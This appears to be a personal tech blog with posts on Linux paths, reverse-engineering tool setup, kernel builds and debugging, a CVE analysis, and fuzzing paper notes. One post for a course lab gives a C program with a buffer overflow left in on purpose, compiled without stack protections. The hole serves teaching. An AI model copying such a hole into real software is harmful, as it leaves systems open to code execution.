PCB Blog

paths in linux

2019-09-10T00:40:10.000Z

There are many “path” in linux. Such as executable search PATH, compiler include path, linker path, dynamic library search path LD_LIBRARY_PATH.

PATH

PATH is an environment variable. It defines the executable search path. When you run executable file without path(absolute or relative path), it will search the executable file from directories that defined by PATH.

At initial, the PATH is defined in /etc/environment.

1
2
3

$ cat /etc/environment 

PATH="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games"

We can append the PATH in the terminal:

1	export $PATH=$PATH:/path/append

We can append the PATH in .bashrc(if terminal is bash) or .zshrc(if terminal is zsh), so the appened PATH is avaiable whenever we open a new terminal.

Include Path

For gcc, it will look in several different places for headers[1]. It will look for headers requested with #include in default directories. We can check the directories by using gcc --verbose

$ cpp --verbose

#include "..." search starts here:
#include <...> search starts here:
 /usr/lib/gcc/x86_64-linux-gnu/7/include
 /usr/local/include
 /usr/lib/gcc/x86_64-linux-gnu/7/include-fixed
 /usr/x86_64-linux-gnu/include
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.

We can specify the include path when we compile the source code by adding -I/path/to/be/added.

Linker Search Path

In order to do the symbol resolution, linker will search for the unresolved symbols in linker search path.

We can use gcc -print-search-dirs | sed '/^lib/b 1;d;:1;s,/[^/.][^/]*/\.\./,/,;t 1;s,:[^=]*=,:;,;s,;,; ,g' | tr \; \\012
to print default linker search path:

$ gcc -print-search-dirs | sed '/^lib/b 1;d;:1;s,/[^/.][^/]*/\.\./,/,;t 1;s,:[^=]*=,:;,;s,;,;  ,g' | tr \; \\012

libraries:
 /usr/lib/gcc/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/:/usr/x86_64-linux-gnu/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/lib/x86_64-linux-gnu/7/:/lib/x86_64-linux-gnu/:/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/usr/x86_64-linux-gnu/lib/:/usr/lib/:/lib/:/usr/lib/

We can specify the linker search path to gcc by adding -L/path/to/be/added.

We can use -B/path/to/directory of gcc to specify the gcc search path. It will insert the path in the head of the searh path list.
For example, we add -B/usr/test/ path to gcc:

$ gcc -B/usr/test/ -print-search-dirs | sed '/^lib/b 1;d;:1;s,/[^/.][^/]*/\.\./,/,;t 1;s,:[^=]*=,:;,;s,;,;  ,g' | tr \; \\012

libraries:
  /usr/test/x86_64-linux-gnu/7/:/usr/test/x86_64-linux-gnu/:/usr/test/:/usr/lib/gcc/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/7/:/usr/x86_64-linux-gnu/lib/x86_64-linux-gnu/:/usr/x86_64-linux-gnu/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/lib/x86_64-linux-gnu/7/:/lib/x86_64-linux-gnu/:/lib/:/usr/lib/x86_64-linux-gnu/7/:/usr/lib/x86_64-linux-gnu/:/usr/lib/:/usr/x86_64-linux-gnu/lib/:/usr/lib/:/lib/:/usr/lib/

LD_LIBRARY_PATH

LD_LIBRARY_PATH is an environment variable you set to give the run-time shared library loader (ld.so) an extra set of directories to look for when searching for shared libraries[2].

Reference

Gcc Search Path: https://gcc.gnu.org/onlinedocs/gcc-4.8.0/cpp/Search-Path.html
Why LD_LIBRARY_PATH is bad: http://xahlee.info/UnixResource_dir/_/ldpath.html

Ghidra Python Uses Other Packages

2019-08-22T13:49:08.000Z

Ghidra is a reverse engineering framework. It is similar to IDA pro and it is a open source project. Ghidra also provide java and python api to write plugin. Actually, its “python” is Jython, and its version is python2.7.
And its site-packages location is /opt/ghidra/Ghidra/Features/Python/data/jython-2.7.1/Lib. It only supports some uses of basic packages. And I want to use other packages(such as protobuf) in Ghidra python, I did not find a proper way to install the protobuf in Ghidra Jython’s site-packages location.

And I find another way to solve it. Firstly, I install protobuf in my system’s default python2.7.

1	sudo pip2 install protobuf

The protobuf is installed into python2.7 site-packages location. To find the site-packges location, you can open python2.7 and type below:

In [1]: import site
In [2]: print(site.getsitepackages())

['/usr/local/lib/python2.7/dist-packages', '/usr/lib/python2.7/dist-packages']

You can find that there are two folders. Add these folders into Ghidra python’s sys.path.

In Ghidra python file, add belows at the start of the file:

1
2
3

import sys
sys.path.append('/usr/local/lib/python2.7/dist-packages')
sys.path.append('/usr/lib/python2.7/dist-packages')

Binaryninja Python Path Install

2019-08-20T22:59:45.000Z

Install binaryninja python path.

Firstly, get the python default path:

1 2	import site print(site.getsitepackages()[0]) # output: /usr/local/lib/python3.7/dist-packages

Then, create a new file binaryninja.pth in /usr/local/lib/python3.7/dist-packages and store the binaryninja python path.

Suppose the binaryninja is installed in /opt/binaryninja, then

1	$ echo "/opt/binaryninja/python" > /usr/local/lib/python3.7/dist-packages/binaryninja.pth

Be Careful When Modifing Binary Program(Abount Stack Alignment)

2019-07-12T14:53:28.000Z

Recently, I want to modify the binary program which add a instruction push $rbx in the binary program. And it will increment the stack by 8 bytes. It sounds good for the binary program.

And I debug the modified binary with gdb, and find that it crashes in movaps instruction.

1	movaps xmmword ptr [rsp+0x50], xmm0

So what happend?

And I found the answers from some blogs(see reference). movaps is “move aligned packed single-precision floating-point values”. If the instruction’s operand is memory, the memory address must be aligned to 16 bytes. And I print the $rsp+0x50, its not 16 bytes alignment. That’s because I pushed $rbx into the stack and increment the rsp to 8 bytes, and that results in rsp is not aligned to 16 bytes.

Reference

C Programs Before main Function

2019-07-02T14:35:48.000Z

What does the program do before main() function

The picture from Patrick Horgan describes what will the c program do before main function.

crt0.o, ctri.o, ctrbegin.o, ctrn.o

If you compile a c program, the linker will link crt0.o, ctri.o, ctrbegin.o, ctrn.o with the target object together.

crt0.o contains _start function, it will initialize the process before call main function, it is defined in libc’s crt0.s file.

According to osdev, ctri.o defines the header of _init and _fini function, and ctrn.o defines the footer of _init and _fini function. And linker will link ctrbegin.o’s section .init and .fini between ctri.o and ctrn.o

ctrbegin.o also defines some functions such as deregister_tm_clones, register_tm_clones, __do_global_dtors_aux, frame_dummy

Reference

git subtree

2019-06-18T22:16:43.000Z

Add a remote repo

1	git remote add -f repo-name git@github.com:repo.git

Merge the repo into the local git project

1	git merge -s ours --no-commit --allow-unrelated-histories repo-name/master

Create a new directory named pro-name and copy the git history of remote repo project into it.

1	git read-tree --prefix=pro-name/ -u spoon-knife/master

Commit the changes to keep them safe

1	git commit -m "subtree merged"

Synchronizing with remote repo

1	git pull -s subtree repo-name branchname

However, I met overlaps with problem. And need add -Xsubtree to specify the directory where the sub-project should pull.

1	git pull -s subtree -Xsubtree=pro-name repo-name branchname

Reference

Compile Kernel using llvm/clang

2019-04-16T20:20:07.000Z

Reference

Tutorial

Start with an empty dir

1
2
3

git clone https://github.com/ramosian-glider/clang-kernel-build.git
cd clang-kernel-build
export WORLD=`pwd`

Install Clang from Chromium:

cd $WORLD
# Instruction taken from http://llvm.org/docs/LibFuzzer.html
mkdir TMP_CLANG
cd TMP_CLANG
git clone https://chromium.googlesource.com/chromium/src/tools/clang
cd ..
TMP_CLANG/clang/scripts/update.py

(To update Clang later on, do (cd TMP_CLANG/clang ; git pull) and run update.py again.)

Clone the linux source tree

cd $WORLD
git clone git://git.kernel.org/pub/scm/linux/kernel/git/stable/linux-stable.git
cd linux-stable
git reset --hard v4.16

(Note that kernel version v4.16 or older is fine, otherwise the latest clang lacks asm-goto support(llvm already support))ref1 and ref2。

Configure and build the kernel

cd $WORLD
export CLANG_PATH=`pwd`/third_party/llvm-build/Release+Asserts/bin/
cd linux-stable
make CC=$CLANG_PATH/clang defconfig
make CC=$CLANG_PATH/clang kvmconfig
make CC=$CLANG_PATH/clang -j64 2>&1 | tee build.log

Set up the VM

cd $WORLD
wget https://raw.githubusercontent.com/google/sanitizers/master/address-sanitizer/kernel_buildbot/create_os_image.sh
# create_os_image.sh requires sudo
sh create_os_image.sh

Run the VM

cd $WORLD
./run_qemu.sh
# in a separate console:
ssh -i ssh/id_rsa -p 10023 root@localhost

Compile with KASAN

Edit .config file and add
1
CONFIG_KASAN=y
Regenerage config file:
1
make oldconfig

Problems

unable reference to `bcmp`

Solutions: reference

Add ‘-fno-builtin-bcmp’ to CLANG_FLAGS

compiler lacks asm-goto support

reference: ref1, ref2, ref3

While the LLVM has supported asm-goto already, it seems that clang doesn’t support asm-goto.

kernel v4.16及之前版本不会有asm-goto的问题

booting problem when compiling kernel with clang kasan.

Solutions: ref

some configuration may cause clang build error

Add CONFIG_KALLSYMS_ALL=y cause boot Failed to start raise network interfaces.
Add CONFIG_KASAN_INLINE=y cause boot Failed to start raise network interfaces.

Add CONFIG_DEBUG_VM, the boot will hang at

[    0.000000] Booting paravirtualized kernel on KVM
[    0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 1910969940391419 ns
[    0.000000] setup_percpu: NR_CPUS:64 nr_cpumask_bits:64 nr_cpu_ids:4 nr_node_ids:1
[    0.000000] percpu: Embedded 53 pages/cpu @        (ptrval) s178760 r8192 d30136 u524288
[    0.000000] KVM setup async PF for cpu 0
[    0.000000] kvm-stealtime: cpu 0, msr 3641e3c0
[    0.000000] Built 1 zonelists, mobility grouping on.  Total pages: 257895
[    0.000000] Policy zone: DMA32
[    0.000000] Kernel command line: console=ttyS0 root=/dev/sda earlyprintk=serial
[    0.000000] Memory: 825300K/1048052K available (26636K kernel code, 1382K rwdata, 4256K rodata, 1804K init, 21016K bss, 222752K reserved, 0K cma-reserved)

clang error: unkown argument: ‘–mpreferred-stack-boundary=4’

link

in drivers/gpu/drm/amd/display/dc/cals/Makefile and drivers/gpu/drm/amd/display/dc/dml/Makefile file, they specify CFLAGS with mpreferred-stack-boundary, which is not supported by clang. Clang has the flag -mstack-alignment=4 that equals. So replace them
with -mstack-alignment=4 in these two files.

clang does not support vlais

comment out CONFIG_EXOFS_FS

link

Undefined reference in amdgpu.ko

link
patch

shellcode exit normally

2019-03-22T16:46:12.000Z

前言

最近和jaguo在给南京大学软件安全课程出Buffer Overflow实验的时候，发现了出现shellcode exit normally的情况，但是并没有”发现”启动了新的shell。

漏洞程序

// buf2.c
// gcc −z execstack −o buf buf2 -fno-stack-protector
#include 
#include 
#include 
#include 
void vul(char *str){
    char buffer[36];
    // buffer overflow
    strcpy(buffer, str);
}

int main(int argc, char **argv){
    char str[128];
    int n = read(0， str, 128);
    if(n < 0){
        printf("Read Error\n");
        exit(-1);
    }
    vul(str);
    printf(”Returned Properly\n”);
    return 0;
}

我们一开始的设计是漏洞程序如上所示，由于需要注入shellcode，有些是不可见字符，所以我们一开始设计将shellcode写入到一个文件attack_input中，然后通过重定位将输入定位到attack_input文件中，可以将shellcode传给输入。

1	./buf2 < attack_input

然而这样就导致虽然能够正确注入shellcode，但是只要执行shellcode中的execve(‘/bin//sh’, 0, 0)，就立即退出/bin//sh程序，而不是给出bash的命令行窗口。

原因

经过查阅资料发现，我们在使用输入重定位的时候，就相当于将进程的输入重定位到文件中，而当程序将文件中的内容读完之后，会关闭该文件，此时相当于将程序的输入（stdin）关闭了。
当该进程启动一个shell进程时，shell进程是该进程的子进程，继承了父进程的文件描述符（包括已经关闭了的标准输入），此时shell发现标准输入已经关闭了，就会退出。

下面我们通过下面的实验来验证一下：


#include 
int main(){
    fclose(stdin);
    system("/bin/sh");
}

编译运行该程序，会发现shell也会正常退出。

解决方案

我们的解决方案就是使用文件读函数正常的从文件中读取shellcode。



// buf2.c
// gcc -z execstack -o buf2 buf2.c -fno-stack-protector

#include 
#include 
#include 
#include 

void vul(char *str){
    char buffer[36];
    // buffer overflow
    strcpy(buffer, str);
}

int main(int argc, char **argv){
    char str[128];
    FILE *file;
    file = fopen("attack_input2", "r");
    fread(str, sizeof(char), 128, file);
    vul(str);
    printf("Returned Properly\n");
    return 0;
}

分析CVE-2017-8890

2019-01-06T01:28:58.000Z

环境

linux kernel版本：4.10.1
gcc编译: 7.4

linux kernel开启KASAN和debug信息

CONFIG_KCOV=y
CONFIG_DEBUG_INFO=y
CONFIG_KASAN=y
CONFIG_KASAN_INLINE=y

CONFIG_CONFIGFS_FS=y
CONFIG_SECURITYFS=y

在编译的时候出现‘undefined reference to `____ilog2_NaN’ ‘

解决方案：patch 将该patch保存为patch.diff，拷贝到linux内核根目录下。

运行命令：patch -i patch.diff，提示输入文件时，先后输入include/linux/log2.h和tools/include/linux/log2.h即可。

Debug

编译Linux内核

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
CONFIG_DEBUG_KERNEL=y
CONFIG_DEBUG_INFO=y

CONFIG_CONSOLE_POLL=y
CONFIG_KDB_CONTINUE_CATASTROPHIC=0
CONFIG_KDB_DEFAULT_ENABLE=0x1
CONFIG_KDB_KEYBOARD=y
CONFIG_KGDB=y
CONFIG_KGDB_KDB=y
CONFIG_KGDB_LOW_LEVEL_TRAP=y
CONFIG_KGDB_SERIAL_CONSOLE=y
CONFIG_KGDB_TESTS=y
CONFIG_KGDB_TESTS_ON_BOOT=n
CONFIG_MAGIC_SYSRQ=y
CONFIG_MAGIC_SYSRQ_DEFAULT_ENABLE=0x1
CONFIG_SERIAL_KGDB_NMI=n

Add to your QEMU command:

1
2
append 'kgdbwait kgdboc=ttyS0,115200' \
serial tcp::1234,server,nowait

gdb连接

gdb vmlinux
target remote :1234
c

PoC

poc
在qemu里面的虚拟机里面运行poc
此时发生crash:

可以发现其访问了（rcx+rax)的地址区域，而该地址是不可访问地址区域

手动下断点
- echo g > /proc/sysrq-trigger

用gdb调试qemu内核

2019-01-03T15:54:43.000Z

编译linux内核

下载内核源码

1	git clone https://github.com/torvalds/linux.git $KERNEL

生成默认的配置

1
2
3

cd $KERNEL
make defconfig
make kvmconfig

编辑.config，开启一些选项

# gdb config
CONFIG_GDB_SCRIPTS=y
CONFIG_DEBUG_INFO=y
# CONFIG_DEBUG_INFO_REDUCED is not set
# CONFIG_RANDOMIZE_BASE is not set

# kgdb config
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERIAL_CONSOLE=y

# kdb config
# CONFIG_STRICT_KERNEL_RWX is not set
CONFIG_FRAME_POINTER=y
CONFIG_KGDB=y
CONFIG_KGDB_SERRIAL_CONSOLE=y
CONFIG_KGDB_KDB=y
CONFIG_KDB_KEYBOARD=y

# manually debug using the SysRq-G
CONFIG_MAGIC_SysRq=y

重新生成config文件，其中有一些子选项，默认即可

1	make oldconfig

使用GCC编译内核

1	make -j$(nproc)

gdb调试

qemu启动的时候添加选项 ‘-gdb tcp:1234’
内核命令行添加’nokaslr’

参考qemu配置如下：

qemu-system-x86_64 -S -smp 2 -m 4G -enable-kvm -cpu host \
    -net nic -net user,hostfwd=tcp::10022-:22 \
    -gdb tcp::1234 \
    -kernel ./kernel/arch/x86/boot/bzImage -nographic \
    -device virtio-scsi-pci,id=scsi \
    -device scsi-hd,bus=scsi.0,drive=d0 \
    -drive file=wheezy.img,format=raw,if=none,id=d0 \
    -append "root=/dev/sda noaslr"

gdb 命令：

1
2
3

gdb vmlinux
target remote :1234
c

kgdb, kdb调试

参考qemu配置：

qemu-system-x86_64 -smp 2 -m 4G -enable-kvm -cpu host \
    -net nic -net user,hostfwd=tcp::10022-:22 \
    -kernel ./kernel/arch/x86/boot/bzImage -nographic \
    -device virtio-scsi-pci,id=scsi \
    -device scsi-hd,bus=scsi.0,drive=d0 \
    -drive file=wheezy.img,format=raw,if=none,id=d0 \
    -append "root=/dev/sda noaslr kgdbwait kgdboc=ttyS0,115200" \
    -serial tcp::1234,server,nowait

强制下断点：
开一个终端连接qemu里的系统，以root用户执行：

1	echo g > /proc/sysrq-trigger

git本地冲突

2018-11-28T03:56:04.000Z

在使用git进行多人协作时，一般需要先pull下来，再commit进行push来避免冲突，然而当pull下来的文件与本地文件有冲突怎么办呢，这时“git stash”就派上了用场：

先将本地的修改存储起来

git stash

pull下来远程仓库的内容

git pull

此时本地的文件已被远程仓库的内容覆盖

还原缓存的内容

git stash pop stash@{0}

手动解决冲突

此时会提示你有冲突，让你手动解决。

fuzzing related work

2018-10-05T19:09:11.000Z

Interesting Fuzzing
Directed Fuzzing
- Directed Greybox Fuzzing(CCS 17)
- Hawkeye: Towards a Desired Directed Grey-box Fuzzer(CCS 18)
Fuzzing Machine Learning Model
- TensorFuzz: Debugging Neural Networks with Coverage-Guided Fuzzing(18)
- Coverage-Guided Fuzzing for Deep Neural Networks
Kernel Fuzzing
Anti-Fuzzing
- FUZZIFICATION: Anti-Fuzzing Techniques(Usenix Security 19)
- ANTIFUZZ: Impeding Fuzzing Audits of Binary Executables(Usenix Security 19)
IoT Fuzzing
- IoTFuzzer: Discovering Memory Corruptions in IoT Through App-based Fuzzing(NDSS 18)
- FIRM-AFL: High-Throughput Greybox Fuzzing of IoT Firmware via Augmented Process Emulation(Usenix Security 19)
Evaluate Fuzzing
- Evaluating Fuzz Testing(CCS 18)

Interesting Fuzzing

Coverage-based Greybox Fuzzing as Markov Chain(CCS 16)

Search Strategy
Power Schedule
通过改变前面两个方法来使程序更大概率地走到low-density region.

T-Fuzz: fuzzing by program transformation(oakland 18)

Fuzzer: T-Fuzz uses an existing coverage guided fuzzer to generate inputs. T-Fuzz depends on the fuzzer to keep track of the paths taken by all the generated inputs and realtime status infomation regarding whether it is “stuck”. As output, the fuzzer produces all the generated inputs. Any identified crashing inputs are recorded for further anlysis.
Program Transformer: When the fuzzer gets “stuck”, T-Fuzz invokes its Program Transformer to generate tranformed programs. Using the inputs generated by the fuzzer, the Program Transformer first traces the program under test to detect the NCC candidates and then transforms copies of the program by removing certain detected NCC candidates.
Crash Analyzer: For crashing inputs found against the transformed programs, the Crash Analyser filters false positives using a symbolic-execution based analysis technique.

T-Fuzz Design

Detecting NCCs: NCCs are those sanity checks which are present in the program logic to filter some orthogonal data, e.g., the check for a magic value in the decompressor example above. NCCs can be removed without triggering spurious bugs as they are not intended to prevent bugs. This paper uses a lightweight method to find the NCCs. Firstly, they define the concept of boundary edges: the edges connecting the nodes that were covered by the fuzzer-generated inputs and those that were not. The method that find the NCCs in this paper is over-approximation, so they find two ways to prune undesired NCC condidates.
Program Transformation: After finding NCCs, T-Fuzz should “remove” the NCCs conditions to guide the execution to the another branch. T-Fuzz transforms programs by replacing the detected NCC candidates with negated conditional jump.
Filtering out False Positives and Reproducing Bugs: As the removed NCC candidates might be meaningful guards in the original program(as opposed to, e.g., magic number checks), removing detected NCC edges might introduce new bugs in the transformed program. Consequently, T-Fuzz’s Crash Analyzer verifies that each bug in the transformaed program is also present in the original proram, thus filtering out false positives. The Crash Analyser uses a transformation-aware combination of the preconstrained tracing technique leveraged by Driller and the Path Kneading techniques proposed by ShellSwap to collect path constraints of the original program by tracing the program path leading to a crash in the transformed program.

CollAFL: Path Sensitive Fuzzing(oakland 18)

paper
source code has not been found.

该paper主要对AFL有两个改进:

AFL是coverage-based greybox fuzzing，它通过对源程序进行轻量级的插桩，来跟踪每次fuzzing的input覆盖哪些路径，然后将路径hash，从而判断每个input是否到达了一个新的路径，如果到达新的路径，则说明该input较好，将该input作为seed。但由于hash可能会发生collision，可能会导致某些input到达新的路径，却没有将该input作为seed。该paper主要针对这一点，采用了一个新的算法，解决了路径hash collision问题，产生的效果也是比较显著的。
提供了一些策略来将seed进行排序，促使fuzzer去探索没有到达的路径。具体做法就是如果某条路径有很多没有探索到的邻居分支，则对该input进行更多的变异；如果某条路径有很多没有探索到的邻居后代，则对该input产生更多的变异。还有一个策略来帮助发现更多的漏洞：如果某条路径进行更多的内存访问，则对该input产生更多的变异。

我个人认为，该论文的主要贡献是提供了一个机制来解决路径的hash collision问题，使得coverage判断更加准确。

AFL Coverage Measurements

AFL使用bitmap(默认64KB)来跟踪edge coverage。没一个字节都对应特定edge的hit count。AFL通过对每个basic block进行插桩，为每个basic block都随机分配一个id，当执行每条路径时，对该路径上的每个basic block都进行如下操作:

1
2
3

cur_location= ;
shared_mem[cur_location ^ prev_location]++;
prev_location = cur_location >> 1;

其中上面的prev_location右移一位主要是为了区分路径A->B和B->A。由于每个basic block的id是随机分配的，所以这种hash方法很容易产生collision，特别当程序比较大的时候，collision rate也越大。

CollAFL’s Solution to Hash Collision

CollAFL通过三种方式来解决hash collision:

通过贪心算法，为每个basic block分配x和y的值，保证每条edge计算的hash值都是不同的。
如果每个basic block只有一个前继basic block，即只有一条边到达该basic block，所以只需要将该basic block的id来表示该edge即可。
如果前面两种方法无法解决，则动态的时候为每条边分配不同的id。

Driller: Argumenting Fuzzing Through Selective Symbolic Execution(ndss 16)

我们都知道，fuzzing对于一些比较宽松的限制(比如x>0)能够很容易的通过变异产生一些输入达到该条件；而symbolic execution非常擅长求解一下magic value(比如x == deadleaf)。这是一篇比较经典的将concolic execution和fuzzing结合在一起的文章，该文章的主要思想就是先用AFL等Fuzzer根据seed进行变异，来测试程序。当产生的输入一直走某些路径，并没有探测到新的路径时，此时就”stuck”了。这时，就是用concolic execution来产生输入，保证该输入能走到一些新的分支。从而利用concolic execution来辅助fuzz。

VUzzer: Application-aware Evolutionary Fuzzing(ndss 17)

Vuzzer是公认的比较好的类AFL fuzzer。它主要利用Data-flow features和Control-flow features来辅助fuzzer变异和进行seed的选择。

Data-flow features

利用dynamic taint analysis 来推断input的结构和类型，以及某段数据在input的偏移。比如，它通过对每个cmp指令进行插桩来判断input的哪些字节与输入有关，并且知道与它比较的另外一个值。同时，Vuzzer也可以对lea指令进行插桩，从而检测index操作是不是与input某些bytes有关。

Control-flow features

Control-flow features可以让Vuzzer推断出执行路径的重要性。比如，某些执行路径最后到达了error-hanling blocks。Vuzzer就通过静态的方法识别出了一下error-handling code。同时，Vuzzer通过对每个basic block赋予特定的权重，来促使fuzzer走到更深的路径中去。

Angora: Efficient Fuzzing by Principled Search(oakland 18)

This paper’s contributations:

Context-sensitive branch coverage. AFL uses context-insensitive branch coverage to approximate program states. This paper adding context information to branch.
Scalable byte-level taint tracking. Most path constraints depend on only a few bytes in the input. By tracking which input bytes flow into each path constraint, Angora mutates only these bytes instead of the entire input, therefore reducing the space of exploration substantially.
Search based on gradient descent. When mutating the input to satisfy a path constraint. Angora avoids symbolic execution, which is expensive and cannot solve many types of constraints. Instead, Angora uses the gradient descent algorithm popular in machine learning to solve path constraints.
Type and shape inference. Many bytes in the input are used collectively as a single value in the program, e.g., a group of four bytes in the input used as a 32-bit signed integer in the program. To allow gradient descent to search efficiently, Angora locates the above group and infers its type.

Designing New Operating Primitives to Improve Fuzzing Performance(CCS 17)

AFL Overview

Mutating inputs(1). AFL uses an evolutionary coverage-based mutation technique to generate test cases for discovering new execution paths of the target application. In AFL, an execution path is represented as a sequence of taken branches(i.e., a coverage bitmap) in the target instance for a given input. To track whether a branch is taken, AFL instruments every conditional branch and function entry of the target application at the time of compilation.
Launching the target application(2). Traditional fuzzers call fork() followed by execve() to launch an instance of the target application. This process occurs in every fuzzing loop to deliver a new input to the target application. It is not only time consuming, but also a non-scalable operation. Previous research shows that the majority of fuzzing execution explores only the shallow part of the code and terminates quickly(e.g., because of invalid input format), which results in frequent executions for the input cases. Thus, the cost of fork() and execve() dominates the cost of fuzzing. To mitigate this cost, AFL introduced a fork server, which is similar to a Zygote process in Android that eliminates the heavyweight execve() system call. After instantiating a target application, the fork server waits for a starting signal sent over the pip from the AFL instance. Upon receiving the request, it first clones the already-loaded program using fork() and the child process continues the execution of the original target code immediately from the entry point(i.e., main) with a given input generated for the current fuzzing loop. The parent process waits for the termination of its child, and then informs the AFL process. The AFL process collects the branch coverage of the past execution, and maintains the test input if it is interesting.
Bookkeeping results(3, 4). The fork server also initializes a shared memory(also known as tracing bitmap) between the AFL instance and the target application. The instance records all the coverage information during the execution and writes it to the shared tracing bitmap, which summarizes the branch coverage of the past execution.
Fuzzing in parallel(6). AFL also supports parallel fuzzing to completely utilize resources available on a multi-core machine and expedite the fuzzing process. In this case, each AFL instance independently executes without explicit contention among themselves(i.e., embarrassingly parallel). From the perspective of the design of AFL, the fuzzing operation should linearly scale with increasing core count. Moreover, to avoid apparent contention on file system accesses, each AFL instance works in its private working directory for test cases. At the end of a fuzzing loop, the AFL instance scans the output directories of other instances to learn their test cases, called the syncing phase. For each collaborating neighbor, it keeps a test case identifier, which indicates the last test case it has checked. It figures out all the test cases that have an identifier larger than the reserved one, and re-executes them one by one. If a test case covers a new path that has not been discovered by the instance itself, the test case is copied to its oen directory for further mutation.

QSYM: A Practical Concolic Execution Engine Tailored for Hybrid Fuzzing(Usenix 18)

该paper是Usenix 18的Distinguished Paper，其主要针对了当前的concolic execution的三个方面进行了优化: Slow Symbolic Emulation, Ineffective Snapshot and Slow and Inflexible Sound Analysis. 从而使得concolic execution更好的适应fuzzing场景。

Motivation: Performance Bottlenecks

Slow Symbolic Emulation

现在主流的conclic executors做符号执行的时候是针对IR中间语言做的(比如KLEE的LLVM IR和angr的VEX IR)，对中间语言模拟执行。其采用IR的原因是实现起来比较简单。由于Intel 64位指令集包含1795条指令，所以针对每条指令总结出来符号的语义对于人工来说是一个非常大的工作量，而IR的指令较少(LLVM IR有62条指令)，符号化这些指令相对比较简单。

然而使用IR则引发了额外的overhead。首先，从机器指令到IR的转换本身就有overhead。由于amd64是CISC(complex instruction set computer)，而IR是RISC(reduced instruction set computer)，一般一条amd64的指令需要转换成多条IR指令，拿angr为例，如果将amd64指令转为VEX IR，则平均增加的指令数是4.69倍。其次，采用IR导致basic block level taint。因为由于效率的原因，从native instructions到IR的转换一般是以basic block为单位的，这样就导致无法将单个的native instruction转换成IR，所以也就只能做到哪些basic block需要符号化，而不是具体的某条指令需要符号化。这样做导致的后果就是如果某个basic block中只有一条指令和输入有关需要符号化，则整个basic block都需要符号模拟，这样就会造成很高的overhead。如果没有IR的话就可以做到指令级别的taint，就能够清楚的判断哪些指令需要符号模拟，哪些指令只需native execution，减少了不必要的符号模拟。实验表明，在一个basic block中，只有30%的指令需要符号模拟。

Ineffective Snapshot

snapshot是conclic execution常用的一个技术，它能够保存某条分支前的状态S，当该分支执行完或者”stuck”时，可以从该状态S直接执行另外一个分支，避免了重新执行的overhead。然而snapshot本身就有一些缺点：snapshot需要保存一些外部的状态(文件系统，内存管理系统)，则此时需要对影响外部状态的系统调用进行处理，一般有两个方法: full system concolic execution and External environment modeling。这两个方法都有一些缺陷：第一个方法是由于外部环境比较复杂，实现起来比较难，overhead较高；第二个则是model的system call较少，并且有些system call建模的不够完全。另外由于fuzzing的输入一般不会共享同一个分支，所以snapshot可能对于fuzzing这个场景也不是很好，所以该paper就没有采用snapshot的机制，对于每个输入都会重新执行，对于系统调用，则具体执行。

Slow and Inflexible Sound Analysis

现在的concolic execution是将某条路径上的所有contraints都满足，从而求解出具体的input。然而复杂的contraints可能会导致输入求解不出。所以该paper的一个解决方法就是只求解出部分contraints。

FAIRFUZZ: A Targeted Mutation Strategy for Increasing Greybox Fuzz Testing Coverage(ASE 18)

FairFuzz focus on branch coverage, it works in two main steps.

First, it identifies the program branches that are rarely hit by previously-generated inputs. It call such branches rare branches. These rare branches guard under-explored functionalities of the program. By generating more random inputs hitting these rare branches, FairFuzz greatly increases the coverage of the parts of the code guarded by them.

Second, FairFuzz uses a novel lightweight mutation technique to increase the probability of hitting these rare branches. The mutation stategy is based on the observation that certain parts of an input already hitting a rare branch are crucial to satify the conditions necessary to hit that branch. Therefore, to generate more inputs hitting the rare branch via mutation, the parts of the input that are crucial for hitting the branch should not be mutated.

Full-speed Fuzzing: Reducing Fuzzing Overhead through Coverage-guided Tracing(oakland 19)

ProFuzzer: On-the-fly Input Type Probing for Better Zero-day Vulnerability Discovery(oakland 19)

paper

NEUZZ: Efficient Fuzzing with Neural Program Smoothing(oakland 19)

paper
code

REDQUEEN: Fuzzing with Input-to-State Correspondence(NDSS 19)

paper
code

NAUTILUS: Fishing for Deep Bugs with Grammars(NDSS 19)

paper
code

Send Hardest Problems My Way: Probabilistic Path Prioritization for Hybrid Fuzzing(NDSS 19)

paper

EnFuzz: Ensemble Fuzzing with Seed Synchronization among Diverse Fuzzers(Usenix Security 19)

paper
code

MOPT: Optimize Mutation Scheduling for Fuzzers(Usenix Security 19)

paper
code

GRIMOIRE: Synthesizing Structure while Fuzzing(Usenix Security 19)

paper
code

Directed Fuzzing

Directed Greybox Fuzzing(CCS 17)

paper
code

Input: Seed Input S

repeat
    s = CHOOSENEXT(S)
    p = ASSIGNENERGY(s)    //This paper focus
    for i from 1 to p do
        s' = MUTATE_INPUT(s)
        if t' crashes then
            add s' to Sx
        else if ISINTERESTING(s') then
            add s' to S
        end if
    end for
until timeout reached or abort-signal

Output: Crashing Inputs Sx

类AFL的fuzzing一般步骤如上所示，该paper主要关注于ASSIGNENERGY(s)这一操作，他们通过对不同的seed s赋予不同的energy，即如果一个seed s’产生的trace距离目标基本块targetB较近，则其energy(p)就较大，基于种子s’进行的变异操作就会变多。所以该paper主要有两个contributation: 设计一套算法计算seed s’产生的trace与targetB的距离；通过模拟退火算法来为每个seed s分配energy。

Hawkeye: Towards a Desired Directed Grey-box Fuzzer(CCS 18)

paper
source code has not been found.

Desired Properties of Directed Fuzzing

P1. The DGF should define a robust distance-based mechanism that can guide the directed fuzzing by avoiding the bias to some traces and considering all traces to the targets.
P2. The DGF should strike a balance between overheads and utilities in static analysis.
P3. The DGF should select and schedule the seeds to rapidly reach target sites. AFL determines how many new inputs(i.e., “energy”) should be generated from a seed input to improve the fuzzing effectiveness(i.e., increase the coverage); this is termed “power scheduling”.
